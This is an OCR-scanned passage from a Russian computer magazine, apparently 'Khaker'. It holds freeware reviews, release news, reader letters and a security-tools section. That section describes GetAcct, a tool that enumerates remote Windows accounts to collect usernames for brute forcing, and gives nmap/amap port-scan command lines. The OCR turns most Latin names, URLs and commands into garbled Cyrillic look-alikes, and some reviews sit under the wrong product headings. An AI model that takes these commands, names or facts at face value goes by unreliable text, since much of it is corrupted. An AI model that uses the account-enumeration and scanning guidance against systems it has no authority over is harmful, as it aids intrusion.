5Ии1сІоѵѵп І_оск ѵ 1 .4 

ѴѴіпсІоѵѵз 2к/ХР/2003 

Зіге: 356 КЬ 

Ггееѵѵаге 

ѵѵѵѵѵѵ.зііиісіоѵѵпіоск.сот 
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Крошечная утилита, которая поз- 
воляет обезопасить машину от не- 
ожиданных выключений и перезаг- 
рузок, которые в некоторых случа- 
ях могут привести к весьма 
чувствительной потери данных. 

ЗНиІсІоѵѵп І_оск автоматически 
стартует после загрузки оси и тихо 
сидит себе в системном трее. Од- 
ним кликом по иконке утилиту 
можно активировать/деактивиро- 
вать. В активном состоянии 
ЗИиІсІоѵѵп І_оск перехватывает все попытки других программ выклю- 
чить/перезагрузить компьютер или принудительно завершить сеанс 
работы пользователя. Ты сам выбираешь, какие сигналы утилита 















должны перехватывать, и как на них ей следует реагировать. В прос- 
тейшем случае утилита просто информирует юзера о попытках той 
или иной проги выполнить І_од 011 или ЗПиІсІоѵѵп. Этот режим стоит 
включать при работе над серьезными проектами, на случай сбоев или 
появления детей/коллег, способных, не посоветовавшись, устроить в 
твое отсутствие «Завершение работы». 

Кроме того, ЭИиІсІоѵѵп І_оск можно использовать для трансляции одних 
действий в другие. К примеру, многие утилиты, типа РІазНОеІ, І\Іего 
Вигпіпд РЮМ, АисІіоСігаЫэег могут, закончив работу, вырубают комп. Так 
вот, ЭПиІсІоѵѵп І_оск может сделать так, чтобы вместо выключения компь- 
ютер переходил в ждущий или спящий режим. 

А еще этой утилитой можно пользоваться для быстрого выключения/пе- 
резагрузки машины. Хотя, если честно, выполнение этих операций 
ЗНиісІоѵѵп І_оск особо не ускоряет, так что я, когда тороплюсь, по-преж- 
нему предпочитаю юзать ЗирегРазІ ЗНиІсІоѵѵп ( ѵѵѵѵѵѵ.хр-зтокег.сот ), ко- 
торый действительно вырубает мой комп в четыре раза быстрее, чем 
длится стандартная процедура выключения. 

Сасіиз Етиіаіог 2.0 

ѴѴіпсІоѵѵз 95/98/Ме/2К/ХР/2003 

Ргееѵѵаге 

Зіге: 2256 Кб 

ѵѵѵѵѵѵ.ісопетріге.сот/сасіиз-етиіаіог 



Для любителей ма- 
ленького веса, эконо- 
мии денег (избавле- 
ния от покупки ком- 
пактных монстров за 
$2 — 3 тысячи) и рабо- 
ты со сложной графи- 
кой одновременно — 
появилось стройное 
решение. е-РаіпІ в 
своей эманации даст 
тебе все необходи- 
мое без лишнего наг- 
руза на твой комп и 
покушения на интернет трафик, который надо было бы спустить на 
скачку полной версии Фотошопа. Решение в стиле «Когда размер 
имеет значение» ;). 

СХ::Т гапзсосіег 2.20.2737 ЯС2 

ѴѴіпсІоѵѵз 2 К/Х Р/2 003 

Вгеееѵѵаге 

Зіге: 13430 Кб 

ѵѵѵѵѵѵ.дегтапіхзоК.сІе 





Время менять имена, если ты 
считаешь, что резиновая женщи- 
на и безалкогольное пиво — пре- 
дел виртуализации. Нет, совсем 
нет, ты не станешь реальным 
виртуалом без ЭМУЛЯТОРА как- 
туса. Помнишь, как бабушка по- 
купала тебе эту шнягу, заставля- 
ла ставить на монитор, чтобы за- 
щитить тебя от радиации и про- 
чей беды? Кактус, кстати, обещал также подъем сексуальности, 
взрыв духовной энергии и всеобщий подъем кармы. Как я раньше 
жил без этого? Ответом на риторический вопрос станет прога 
Сасіиз Етиіаіог. Не знаю, насколько реально ты сможешь оздоро- 
виться, но по крайней мере, твоя бабушка будет спокойна и изба- 
вит стол от ненужного сорняка :). Пока же буду ждать эмулятора 
галлюциногенного кактуса :). 

Саіт 1 .4.0 іог ѴѴіпсІоѵѵз 

ѴѴіпсІоѵѵз 95/98/Ме/2К/ХР/2003 

Вгееѵѵаге/Ореп Зоигсе 



Зіге: 6731 Кб 
даіт.зоигсеіогде.пеі 



Кого можно преследовать повсеместно? Безот- 
ветную любовь или отчаянного должника? Вов- 
се нет, порой приходится отыскивать обыкно- 
венных коллег по работе на пространстве мно- 
жества ІМ-сетей. Тут любимой ІСО изменяют с 
АІМ, ѴаНоо, ЗаЫэег и кучей других менее име- 
нитых коллег по цеху. Даже мой новый ноут на 
Зопота с гигом памяти не вытянет груза доб- 
рой полусотни возможных болталок. 

Нужно универсальное и компактное решение, 
которое поставляется с Оаіт — универсаль- 
ным клиентом, который одновременно работа- 
ет с множеством сетей, так что ты останешься 
на связи даже с передовиками ІМ-разврата :). В отличие от ряда подоб- 
ных прог, Оаіт удачно работает с беткой ІЕ 7, недавно покосившей це- 
лую серию более ярких имен. 

е-РаіпІ 2.0.16 

ѴѴіпсІоѵѵз 95/98/Ме/2К/ХР/2003 

ЗІпагеѵѵаге 

Зіге: 5466 Кб 

ѵѵѵѵѵѵ.тіпбѵѵогкзНор.сот/аІсНету/раіпШтІ 



Лето пролетело, но мне и сейчас так хочется легкости! Совсем ломает тя- 
гать рабочий Р4-ноут домой, разгоняя толпы пассажиров метро огромным 
баулом. Хочется легкости маленькой 8.4-дюймовой Дюймовочки, которая, 
увы, не обладает нужной мощностью для работы с Фотошопом. Особенно 
ситуация ухудшается, когда ты привык работать с РЗ, не отказываясь от ра- 
дости кучи дополнительных плагинов. 



В безостановочной борьбе за универсализацию сложно обойти 
проблему работы с множеством звуковых форматов. Вчера тебе 
нужно было перегнать мелодию в тісіі для установки на мобилу ма- 
лолетней сестры, сегодня ѵѵта-файлы перевести в классику трЗ для 
проигрывания на допотопном плеере, а завтра ты устроишься на ра- 
боту, где админ запретит установку ООО-плеера. Не жизнь, а сплош- 
ная перестройка, точнее, перегонка — из формата в формат. Множест- 
во разработчиков имеют дурную привычку монополизации производ- 
ства софта для работы с форматом собственного производства. Ответ 
подобным софтверным барыгам — ОХ Тгапзсосіег, который сможет пе- 
релопатить несметные тысячи форматов без покушения на зелень из 
твоего кармана. 




ТгаКісСотргеззог 0.1 ВиіІсІ 145 

ѴѴіпсІоѵѵз 95/98/Ме/2К/ХР/2003 

Ргееѵѵаге 

Зіге: 558 Кб 

ѵѵѵѵѵѵ.ісотргеззог.сот 



Сейчас, отсиживаясь на платном ОРВЗ'е, я вспоминаю то время, как 
сладкий сон, когда гонял по десятку гигов ежедневно между двумя 
0012-станциями. Тогда халявный бендвич казался необходимым ус- 
ловием. Сейчас же лишняя пара гигов может выгнать тебя в город за 
покупкой очередной карточки для пополнения баланса мобилы. Что- 
бы сократить число подобных «выгонов», я предлагаю тебе обратить 
свой огненный взор на данный компрессор, который сможет сокра- 
тить на 40 — 45% твои затраты на трафик. 

Стоит помнить, что сжиму поддастся лишь текстовой трафик, и 
для сокращения затрат на вебе тебе придется отказаться от рос- 
коши просмотра картинок. Нахрена эта лепота, когда на мобиле 
остается меньше полубакса? Разумные и экономные подружатся с 
ТгаІІісСотргеззог. 
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ѴѴогкег ѵ 2.10.2 



Р05ІХ (*ВЗР, Ыпих, Зоіагіз...) 

ЗІ 2 Ѳ (в .Ь?2): 560 КБ 

Иир://ѵѵѵѵѵѵ.Ьоотегапд5ѵѵогІсІ.сІе/ѵѵогкег/ 
Лицензия: СІМІ) ОРІ_ 



ѴѴогкег — простой 
файловый менеджер 
для Х-ѴѴіпсІоѵѵ с при- 
вычным интерфейсом 
в виде двух панелей. 
Примечателен тем, что 
не требует графичес- 
ких библиотек, вроде 
(ЗТК+ и Оі. Все основ- 
ные команды редстав- 
лены в виде кнопок в 
специальной нижней панели: с их помощью можно как проводить фай- 
ловые операции (копирование, удаление, перемещение и т.п.), так и уп- 
равлять отображаемыми списками (перемена мест панелей, сортировка, 
фильтры), выполнять такие «продвинутые» действия, как, например, 
монтирование СО-привода, вызов текстового редактора тсесііі, терми- 
нала хіегт или другой внешней программы. Перечень доступных в ниж- 
ней панели функций этим не ограничивается, и по нажатию на сирене- 
вую полоску обновляется, предоставляя кнопки для работы с Іаг и архи- 
вами в Хдт., гаг, гір, ІИа, Ьф2 (создание, сжатие и разархивирование, кон- 
вертирование из д т. в Ьг2), с утилитами сі/со, сѵз и сШ, с изображениями 
(Іредорііт, конвертирование в ірд/рпд, вызов ОІМР), с аудиокодерами 
(додо, Ыабеепс, ІЗепс) и аудиодисками (сфагапоіа для кодирования тре- 
ков с СО). На месте любой из двух главных панелей, помимо списка фай- 
лов, может отображаться выбранный рисунок или подробная информа- 
ция о текущем файле/каталоге. Имеется встроенный просмотрщик текс- 
товых файлов и история переходов по каталогам для каждой панели. 

ЫеІѴУЫзІІег ѵ 2.6.1 

Ыпих, Зоіагіз, ѴѴіпсІоѵѵз 

Зіге (в .д т): 1380 КБ* 

Ііир://пе1ѵѵІііз1Іег.зрЬ.ги 

Лицензия: ѲІЧІ) ѲРІ_ 



ЫеІѴѴИізІІег — написанная на Заѵа утилита для мониторинга за сетевыми 
объектами. Позволяет создавать в своем главном окне карту, состоящую 
из узлов и окружающих территорий. 

В роли первых выступают разнооб- 
разные серверы, точки доступа, Ііге- 
ѵѵаІІ'ы, хабы, терминалы, обычные 
рабочие станции и т.п. Для каждого 
из них задаются тип, ІР-адрес (мо- 
жет отображаться и как имя, полу- 
ченное от 0143), дополнительное 
описание и/или картинка, присут- 
ствующие на узле сервисы (РТР, 

НТТР, РОРЗ, ЗМТР и ЗЗН), управля- 
емость по ЗІЧМР, включение мони- 



торинга. «Территории» — это заданные области на карте, которым прис- 
ваиваются цвета, тень, заголовок и описание — таким образом, можно вы- 
делить часть карты с рабочими станциями сотрудников какого-то подраз- 
деления компании для наглядности. Сам процесс мониторинга осуществля- 
ется с помощью утилиты Іріпд, а не отвечающие на его запросы объекты, 
выделяются красным цветом (это событие опционально оповещается со- 
общением или письмом на е-таіі). После расположения всех узлов их 
можно в режиме Соппесі тобе друг с другом подключить в соответствую- 
щем организации сети порядке. При наводе мышкой на любой из них 
отображается расширенная информация, полученная за время наблюде- 
ния (например, ирііте или доступность какого-либо из сервисов в данный 
момент). ІМеІѴѴНізІІег умеет самостоятельно находить сети и сканировать 
их на наличие устройств с поддержкой ЗІММР. В программу входят утили- 
ты для работы с ЗЫМР, сканер портов. Созданная карта может быть сох- 
ранена в обычный файл или базу данных МуЗОІ_. 

* Сборка для Ыпих. 

Мѵи ѵ 1.0 

Ыпих, РгееВЗР, Мае 03 X, ѴѴіпсІоѵѵз 

Зіге (в .Ьг2): 9,5 МБ* 

ѵѵѵѵѵѵ.пѵи.сот 

Лицензия: ѲШ ѲРІ_ 



І\Іѵи — новая среда разработки ѵѵеЬ-сайтов, спонсируемая компанией 
Ыпзріге и основанная на движке Оеско и проекте МогіІІа Сотрозег. Из пос- 
леднего вполне очевидно вытекает базовая функциональность программы, 
однако плохого в этом ничего нет. В Ыѵи переняли опыт разработчиков ре- 
дактора ѵѵеЬ-страниц МогіІІа, возможности и интерфейс которого многок- 
ратно были проверены пользователями и временем. Всего представлено 
четыре режима работы: «обычный» (полный ѴѴУЗІѴѴУО), «НТМЬтэги» 
(аналогичен первому, но возле каждого видимого элемента указан откры- 
вающий его тэг В — перед жирным текстом, А — перед ссылками и т.п.), 
«код» (текстовый редактор самого кода с подсветкой и нумерацией строк), 
предварительный просмотр. Главным плюсом последнего и важным мо- 
ментом для всего І\Іѵи является вышеупомянутый движок Оеско, генериру- 
ющий отображение и позволяющий сразу понять, как эта страница будет 
точно выглядеть в МогіІІа/РігеІох. Стоит отметить встроенный РТР-менед- 
жер для закачки созданных страниц на сайт (работу со многими проектами 
упрощает «менеджер сайта І\Іѵи», в котором могут храниться данные для 
доступа к различным РТР). Реализован и редактор таблицы стилей СЗЗ с 
интуитивно понятным внешним видом и достаточно богатыми возможнос- 
тями. Поддерживаются темы и расширения. В целом же, Ыѵи представляет 
собой доработанную с умом версию МогіІІа Сотрозег, которую можно сме- 
ло рекомендовать как новичкам (для них есть и полностью русскоязычная 
версия продукта), так и более опытным сайтостроителя м. 

* Сборка для Ыпих. 

РиТТѴ ѵ 0.58 

РОЗІХ, ѴѴіпсІоѵѵз 

Зіге (в .дг): 1530 КБ 

ѵѵѵѵѵѵ.сЫагк.дгеепепб.огд.ик/~5д1а1Наіті/риНу 

Лицензия: МІТ 



РиТТѴ — распространенная открытая реализация клиента для протоколов 
Теіпеі, ВІодіп и ЗЗН. Служит продвинутой заменой разнообразным неболь- 







шим консольным утилитам для установления связи с удаленным компьюте- 
ром и дальнейшей работы с ним (после подключения открывается указан- 
ный терминал, в котором и проходит привычный сеанс). Конфигурация 
РиТТѴ позволяет полностью настраивать интерфейс терминала (в его роли 
«по умолчанию» используется хіегт): размеры окна, список строк для обрат- 
ной прокрутки, вид курсора, поведение мышки, все отображаемые цвета 
(задаются тремя значениями по ВОВ), шрифты и т.п. Кроме того, присут- 
ствует опция контролирования некоторыми последовательностями клавиа- 
туры, управление «звонками» и такими продвинутыми функциями, как, нап- 
ример, удаленное изменение размеров терминала. При подключении под- 
держивается включение/выключение алгоритма Нэгла и ТСР кеер-аііѵе, со- 
единение через прокси (ЗОСКЗ 4/5, НТТР, Теіпеі, локальный). Полезной мо- 
жет оказаться функция установки значений произвольным переменным ок- 
ружения. Для ЗЗН задается порядок предпочтительных алгоритмов шифро- 
вания (АЕЗ, ВІоѵѵзіТИ, ОЕЗ/ЗОЕЗ), версия протокола (1 , 2, только 1 или толь- 
ко 2), включение/выключение сжатия, файл с ключом для авторизации и 
другие параметры. Предусмотрена система логирования любых сеансов. 

Сгапиіе ѵ 1.1.6 

Ыпих, РгееВЗР 

Зіге (в .д т)\ 445 КБ 

ІШр://дгапиІе.5оигсеІогде.пеі 

Лицензия: ѲШ ѲРІ_ 




Огапиіе — программа, облегчающая 
процесс запоминания новых слов. В 
ее основе лежит реализация методи- 
ки немецкого психолога Лейтнера по 
применению специальных карточек. 
Суть заключается в составлении кар- 
точек, на которых с одной стороны 
указывается слово, например, на 
русском языке, а на другой — на 
иностранном (в качестве кодировки 
используется ІІТР-8, так что поддер- 
живается множество специфичных 
национальных букв). Дополнительно 
можно вводить пример применения 
этого неизвестного «играющему» 
слова (предложение со знаком «~» 
на месте, где оно должно быть). Та- 
ким образом составляется колода, и 
начинается процесс опрашивания: 
компьютер выдает иностранное сло- 



во, а пользователю необходимо 
ввести его перевод, после чего демо- 
нстрируется результат проверки и 
можно переходить к следующей кар- 
те. Колода по усмотрению переме- 
шивается, а повторение одних и тех 
же слов в рамках заданной колоды 
регулируется автоматически. Коло- 
ды при желании «складываются» в 
различные отделы картотеки, после чего полученный файл можно сохра- 
нить для дальнейшего использования. Несколько готовых колод доступны 
для скачивания в репозитории проекта на ЗР.пеТ Для повышения эффектив- 
ности программа умеет воспроизводить запоминаемые слова в звуке (при 
наличии установленного ЗіаЮісі). 




СсаІсіооІ ѵ 5.6.25 

РОЗІХ (*В5Р, Ыпих, Зоіагіз...) 

Зіге (в .дг): 1728 КБ 

ѵѵѵѵѵѵ.дпоте.огд 

Лицензия: ОШ ѲРІ_ 



(Зсаісіооі — калькулятор с интер- 
фейсом (ЗТК+ 2.0 для ОЫОМЕ. Рабо- 
тает в четырех основных режимах: 
обычный, расширенный, финансо- 
вый, научный — отличаются они на- 
бором кнопок с функциями (если в 
обычном представлены лишь 4 опе- 
рации, то в финансовом присутству- 
ют такие специфичные вещи, как, 
например, регулярные платежи). 
Встроенная система регистров па- 
мяти позволяет хранить и извлекать 
до 10 значений. Набор представлен- 
ных в научном режиме функций достаточно широк (если и их мало, можно 
создавать свои), предусмотрены и побитовые операции (ОВ, АІ\Ю, N01", 
ХОВ, ХІМОВ), и редактируемые базовые константы (е, Пи, коэффициент 
преобразования км в мили и т.п.). Работать можно в четырех системах 
счисления (помимо 10-чной, это 2-чная, 8-чная и 16-чная) и трех форматах 
вывода (инженерный, научный, с фиксированной точкой), а также с задан- 
ным количеством значащих цифр в получаемой точности. Встроен простой 
генератор случайных чисел (от 0,0 до 1 ,0). В случае возникновения такой 
острой необходимости, можно вставить численное значение любого вве- 
денного символа из таблицы АЗОМ. 
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033 ВЕІ.ЕАЗЕ ОЮЕЗТ: ТНЕОРЕЫСО 3.0 

ТИеОрепСО представляет собой основанный на ІІЬипІи І_іпих 
ЫѵеСО-дистрибутив с набором популярнейшего открытого и 
свободного программного обеспечения для ѴѴіпсІоѵѵз. Цель 
проекта — показать пользователям последние достижения 
разработчиков РОЗЗ (Ргее апб Ореп Зоигсе ЗоЙѵѵаге), 
доступного как для ѴѴіпсІоѵѵз, так и Ыпих. В ТІіеОрепСО 3.0 
вошли следующие пакеты: офис ОрепОШсе 1.1.4, текстовый 
процессор АЬіѴѴогсІ 2.2.8, генератор РйР-файлов РйРСгеаІог 
0.8, графические редакторы ОІМР 2.2.8 и ТихРаіпі 0.9.14, 
программа для создания ѵѵеЬ-страниц І\1ѵи 1 .0 (см. обзор), 
ѵѵеЬ-браузер РігеЬх 1 .0.4, почтовый клиент ТИипсІегЬігс1 1 .0.2, 
ІМ-клиент Оаіпл 1 .3.1 , аудиоредактор Аисіасйу 1 .2.3, архиватор 
7-гір 4.23, тектовый редактор І\ІоІерасІ2 1.0.12, симулятор 
Вселенной Сеіезйа 1.3.2, игры ЗокоЬап 1.187 и Вайіе Ьг 
ѴѴезпоІІі 0.9.3, скринсейверы ВеаІІу ЗІіск Зсгеепзаѵегз. 



ИЗ ДРУГИХ РЕЛИЗОВ: 

ІМоѵеІІ ОгоирѴѴізе 7 Веіа, ІЧеІВЗО ОКісе 3.4.1, ОрепЗЗІ. 
0.9.8, ОІМОМЕ 2.10.2 и 2.12 Веіа 1, ЗІІЗЕ Ыпих Епіегргізе 
Зегѵег 9 ЗР2, ЗресіаІ Мапсігіѵа СІиЬ КОЕ 3.4, РНР 4.4.0, 

Оеег Рагк АІрІіа 2, Рігеіох 1.0.6, ТРіипсІегЬігсІ 1.0.6, 
ОрепОШсе.огд 1.1. 5гс, РгееВЗй 6.0-ВЕТА1, Тгапзсосіе 1.0.0, 
ѴѴНАХ 3.0, Мапсігіѵа Ыпих 2006 Веіа, МогіІІа Зиііе 1.7.10, 
Орега 8.02, КОЕ 3.4.2, ЗуІрПеесІ 2.0.0, АЗРЫпих Зегѵег IV, 
МогіІІа 1.7.11. 
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8ТСЫ(е §(едо 3.1 


8§ідпз РігеѵѵаІІ 


ѴѴіп 98/МЕ/2к/ЫТ/ХР 


ѴѴіп 98/МЕ/2к/І\ІТ/ХР 


РгееѴѴаге 


ЗНагеѴѴаге 


Зіге: 118кЬ 


Зіге: 3.1 тЬ 



ѵѵѵѵѵѵ.зісіііе.пагосі.ги ѵѵѵѵѵѵ.сопзеаІІігеѵѵаІІ.сот 



Мы говорим «хакер», а подразуме- 
ваем — безопасность. Мы говорим 
безопасность, а понимаем под 
этим... закрытую переписку и за- 
шифрованные спрятанные данные. 
Программа ЗТСІЛе обеспечивает 
полную защиту твоей личной элект- 
ронной переписки, позволяя шифро- 
вать (алгоритм выполнен в соответ- 
ствии с ГОСТ 28147-89) письма пе- 
ред отправкой. Этот процесс проис- 
ходит в оперативной памяти, ника- 
кие временные файлы не создаются, так что можешь не переживать — ник- 
то и ни при каких обстоятельствах не сможет обнаружить ненужные улики. 
Софтина пока что работает с Оійіоок, ОиІІоок Ехргезз и ѵѵеЬ-интерфейсом 
почты, последнее особенно примечательно. Хотелось бы получить и интег- 
рацию с летучей мышкой — Ваі'ом. Перед отсылкой письмо шифруется и 
сжимается архиватором, что позволяет уменьшить размер, тем самым сэко- 
номив трафик. В бесплатной версии ключ для работы формируется из за- 
данного тобой пароля, когда в коммерческой используются ключи на специ- 
альных носителях. ЗТСІЛе позволяет создавать и пересылать скрытые вло- 
жения в письме НТМІ_ формата. В общем, программа достаточно перспек- 
тивная, так что будем юзать, шифровать, пересылать и ждать новых версий. 



Так, письма шифровать научились, прочитав описание программы 
ЗТСІЛе Зіедо 3.1, а теперь и за всей сетевой активностью будем сле- 
дить, чтобы обезопасить себя от лап сетевых хулиганов. 83ідпз РігеѵѵаІІ 







2.26 — это не что иное, как файрвол, который защитит твой компьютер 
или даже целую локальную сетку от деятельности таких зловредных 
программ, как трояны, вирусы и т.д. Чем данная софтина мне сразу пон- 
равилась, выделившись из толпы соперников-аналогов, так это широ- 
той возможных настроек. Здесь можно вручную ограничить маршрут 
чуть ли не каждого пакета. Ты в праве контролировать входные и выход- 
ные пакеты, создавать и настраивать правила для сетевых ресурсов, от- 
дельных приложений и сервисов. Ведется подробнейший лог — ты бу- 
дешь знать все о своей системе. Кстати говоря, учитывая сложность и 
тонкость настройки файрвола, будет вдвойне приятно узнать о функции 
переноса конфигурационных файлов на другой компьютер. В общем, я 
снова перешел на продукцию СопзеаІРігеѵѵаІІ (помнишь, несколько лет 
назад был такой популярнейший файрвол — СопзеаІ РС?). На сайте 
разработчика, кстати, также имеется утилита для удаленного админист- 
рирования, советую заодно скачать и ее. 

СеІАссІ 1.3.1 

ѴѴіп 95/98/М Е/2к/ІЧТ/ХР 

ВгееѴѴаге 

Зіге: 436 Кб 

ѵѵѵѵѵѵ.зесигНуІгісІау.сотЛооІз/Ѳе^АссМіітІ 



Большинство версий ѴѴіпсІоѵѵз по умолчанию позволяют анонимному юзеру 
(гостю) удаленно просматривать информацию о пользователях, прописан- 
ных в системе. Естественно, это огромная брешь в безопасности, так как 
потенциальный хакер получает отличную возможность собрать для себя 
необходимые сведения. Те же имена пользователей пригодятся во время 
брутфорса, установленные в системе сервисов. Бойцы из МісгозоЛ эту си- 
туацию предвидели, поэтому в регистре ѴѴіпсІоѵѵз существует специальный 
ключ ВезІгісІАпопутоиз. Если установить его значение в единицу, то ано- 
ним, по идеи, полностью лишается возможности считывать данные о поль- 
зователях в системе. На практике эта защита оказалась пустяшной, появи- 
лись консольные утилиты изег2зісІ апб зісІ2и5ег ( еѵдепіі.гисІпуі.ги/зоП/зісі. '/). 
Используя 5Ю (Зесигііу ІсІепІіТуег — уникальный идентификатор, однознач- 
но определяющий конкретного пользователя или группу), они позволяли 
просматривать список юзеров на удаленной машине, даже если параметр 
ВезігісіАпопутоиз был установлен в "Г, а с помощью системной функции 
ЫеЮзегОеІІпІо получали полную информацию о них. Программа ѲеІАссІ — 
это успешное развитие этих утилит, воплощающая в себе их возможности. 
Пользоваться ей как нельзя просто. Нужно лишь указать ІР-адрес или 
ЫеіВЮЗ-имя удаленного компа и нажать на кнопку (Зеі Ассоипі, уже через 
несколько секунд список пользователей со всей раздобытой инфой появит- 
ся у тебя на экране. Единственный момент, который может вызвать затруд- 
нения, — параметр Епб оі ВЮ. ВЮ — это еще один идентификатор пользо- 
вателя. Администратор, например, обычно имеет ВЮ равный 500. Обозна- 
чив в поле Епб оі ВЮ число 1050, ты получишь информацию о пользовате- 
лях, имеющих ВЮ равный или меньший этого значения. 




ТНС-атар 5.1 

Ыпих, ВЗР 

(ЗРІ- с ограничениями 

Зіге: 255 Кб 

іПс.огдЛІпс-атар/ 



Если хочешь выяснить, какие сервисы установлены на удаленной маши- 
не, — просканируй ее порты. В большинстве случаев можно обойтись од- 
ним лишь сканером безопасности, однако здесь, как и везде, не обош- 



лось без исключений. 
Каждый знает, что лю- 
бой стандартный сер- 
вис обычно работает 
на определенном пор- 
те: например, РТР — 
на 21, ЗЗН — на 22 и 
т.д. Тем не менее, ад- 
министраторы частень- 
ко прибегает к одной 
очень простой, но по- 
лезной уловке. Для то- 
го, чтобы скрыть по- 
тенциально уязвимые 
сервисы, они устанавливают их на нестандартные порты. В этом случае 
даже легендарный сканер безопасности птар остается не у дел, так как 
не может определить РТР-сервер, работающий на 31337 порту, даже ес- 
ли он там действительно есть. Но не беда! С этой задачей на ура справ- 
ляется сканер атар от известной хакерской группы ТНО. Этот сканер с 
большой вероятностью определит даже те сервисы, которые работают 
не на своих стандартных портах. Успех достигается за счет того, что 
программа посылает сервису специальные идентификационные пакеты, 
после чего анализирует ответ и ищет соответствие в специально состав- 
ленной базе данных. До неприличия простой механизм позволяет опре- 
делить ЗЗЬсервер, запущенный на 2162 порту, или веб-сервер, установ- 
ленный на девяностом. Сканер атар легко сканирует как один конкрет- 
ный порт, так и заданный диапазон (#атар 192.168.0.2 20-1000). Однако 
для лучшей производительности рекомендую использовать его совмест- 
но с птар'ом. Алгоритм следующий: сначала птар, используя все свои 
возможности, определяет на удаленной машине открытые порты и запи- 
сывает результат в файл, далее за работу берется атар, которому оста- 
ется проанализировать открытые порты и вывести результат. На практи- 
ке это можно сделать примерно так: #птар -з5 -оМ гезиііз.птар -р 1- 
65535 ІР-адрес #атар -і гезиііз.птар -о гезиііз.атар -т 

№1 Тооіз 3.1 

ѴѴіп 98/МЕ/2к/ІМТУХР 

РгееѴѴаге 

Зіге: 13.1 тЬ 

изегз.рапбога.Ье 



Знаешь, чему равно отношение длины окружности к ее диаметру? Я вот 
невольно произнес нехорошее слово, которое начинается на это самое, 
когда увидел описание программы ІЧеІ Тооіз в инете. Один чувак как-то 
раз решил создать хак-тулзу, включающую в себя все возможные сете- 
вые программы и причиндалы — и ему это удалось! Число программ, 
интегрируемых в Ыеі Тооіз, превышает восемь десятков. Некоторые из 
них, конечно, уже устарели (смешной генератор кредиток, например), но 
сканеры (сканирование диапазонов на наличие заданных портов оди- 
ночного айпишника по полной, то есть с 1 по 65535 порт), резолверы, 
пингеры, флудеры, троян-хантеры и прочие тулзы — работают на ура! 
Также ты сможешь создать примитивный локальный НТТР/ІВС сервер, 
баунсер. Всегда под рукой будет средство для сравнения файлов, де- 
тального изучения ехе'шников, снифания пакетов. В общем, для деталь- 
ного рассмотрения данного хакерского инструментария потребуется це- 
лая статья. Размер софтины не утешителен для диалапщиков — 13 мет- 
ров, но ты же найдешь ее на нашем диске, так что это не беда :). 
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Прием и обработку входящей 
корреспонденции проводит старший 
ПОЧТМЕЙСТЕР 
Сепіпег (сеп!пег@ геаі. хакер. ігі) 
\ллллл/.Ііѵе]оитаІ.сопѴ~оператор 





Ргот: зегѵісеООЗ [зегѵісе003@пагосІ.ги] 

§иЬ|: Привет перцы 

Здраствуйте журнал хакер вот у меня такая проблема я хочу соз- 
дать свой веб сайт а прогу найти в инете не могу помогите пожа- 
лйста где можно скачать прогу бусплатно и простенькую чтоб да- 
же ламо мог общаться с ней или напишите название такое как 
она называетсья пожалуста жду очень прошу ветиь если вам не 
сложно это сделать 

Ве: Здравствуй, многоуважаемый. Начну с главного: да, у тебя действи- 
тельно есть проблема. Давай представим, что ты все же создал свой 
сайт, и все желающие смогут на него взглянуть. И что они там увидят? 
Те же самые бестолковые каракули, которые ты не постеснялся заслать 
мне для прочтения? Сдается мне, что для тебя есть только один вариант 
выхода из кризиса: освоение дефолтного виндового ІМоіерасІ не только 
для ПітІ-верстки, но и для изучения основ грамматики, орфографии и 
синтаксиса родного русского языка. Говорят, он велик и могуч. Дерзай. 
Прошей свой мозг грамотно :). 

Ргот: ОІед В. [ЬоІед2@уапсІех.ги] 

5иЬ|: Пожелания 

Здравствуйте, уважаемые хАкеры, если вы еще можете так назы- 
ваться. Не буду оскарблять, обзывать и т.д. цель моего письма — 
иная. Мне 15 лет и я читаю ваш журнал вот уже год. Вернее сказать, 
читал и раньше, понемногу:], но регулярно — только год. Значит, так. 
Помню, какие раньше были номера... Они содержали статьи не толь- 
ко на тему компьютерной безопасности, но и стать общего развле- 
кательного характера. Почему бы, например, не упоминуть на стра- 
ницах своего издания о таком немаловажном аспекте хакерской де- 



ятельности, как социальная инженерия? Ведь дело истинного хаке- 
ра не сводится лишь к «прямолинейным» действиям по взлому сис- 
темы? Есть и альтернативные методы достижения поставленных це- 
лей. Да и людям, не осведомленным в области компьтерной безо- 
пасности, будет интересно читать данный материал. Ведь он имеет 
реальное применение в жизни. 

Например, в последнем номере [07.05] имеется статья с обзором интер- 
нет-кафе Москвы. Вот этот материал интересно читать. Я думаю, что 
многим интересно. Нет, я не призываю вас переделать журнал в пол- 
ностью развлекательное издание. И не надо меня отправлять в редак- 
цию «Хулигана». Это совсем несерьезно. Просто ваш журнал постепен- 
но превращается в іпіегпеі-зесигііу издание. И круг читателей сужается, 
разочаровавшись в авторах... Я призываю разнообразить контент изда- 
ния всевозможными материалами, граничищами с реальной жизнью, 
но, в то же время, имеющими отношение к теме хакерства. Да, кстати, 
у вашей редакции ведь имеется уйма параллельных изданий? «Желе- 
зо», «Хулиган» и т.д. Выделите тогда, если не терпится писать про безо- 
пасность, еще одно зесигііу-издание. Оно, кстати, будет единственным 
на рынке и будет иметь постоянный круг читателей в лице администра- 
торов к.систем и т.д. 

Примером идеальных номеров могут служить журналы «Хакер», издан- 
ные в 2000 году и позже. Но не этот год. Хочется разнообразных мате- 
риалов, а не опмсания всевозможных взломов и только. Если я не прав, 
прошу возразить. Возразить, конкретно указавая на мои упущения. Не 
переводя разговор в шуточную форму. Обязательно ответьте, ибо в про- 
тивном случае я разочаруюсь в еще одном издании. Я думаю, что выра- 
жу желание тысяч... 

С Уважением к редакции, Олег Васильевич ака ВоІед2 ака Зресіог, пос- 
тоянный читатель X. 



ГЕНИАЛЬНАЯ ИДЕЯ СНОВА ПРИШ- 
ЛА В МОЮ МОГУЧУЮ ГОЛОВУ: ВСЯ 
ЧЕЛОВЕЧЕСКАЯ ЦИВИЛИЗАЦИЯ 
ПОГИБНЕТ ПО ПРИЧИНЕ ТОГО, 
ЧТО МЫ ВСЕ ВОСПРОИЗВОДИМ 
ВСЕ ВОКРУГ СЕБЯ ПОДОБНО СЕБЕ 
ЖЕ, НЕ ДОДЕЛЫВАЯ ДАЖЕ ЭТОГО 
ДО КОНЦА. ДРУГИХ ПРИЧИН НЕ БУ- 
ДЕТ. МЫ ВСЕ — НЕКИЕ БИОМЕХА- 
НИЧЕСКИЕ УСТРОЙСТВА, ДОВОЛЬ- 
НО КАЧЕСТВЕННО ИЗГОТОВЛЕН- 
НЫЕ, НО ЛИШЕННЫЕ ПОНАЧАЛУ 
ФИРМЕННЫХ ПРОШИВОК. ЖИЗНЬ 
САМА НАС ПОТОМ ПРОШИВАЕТ, 



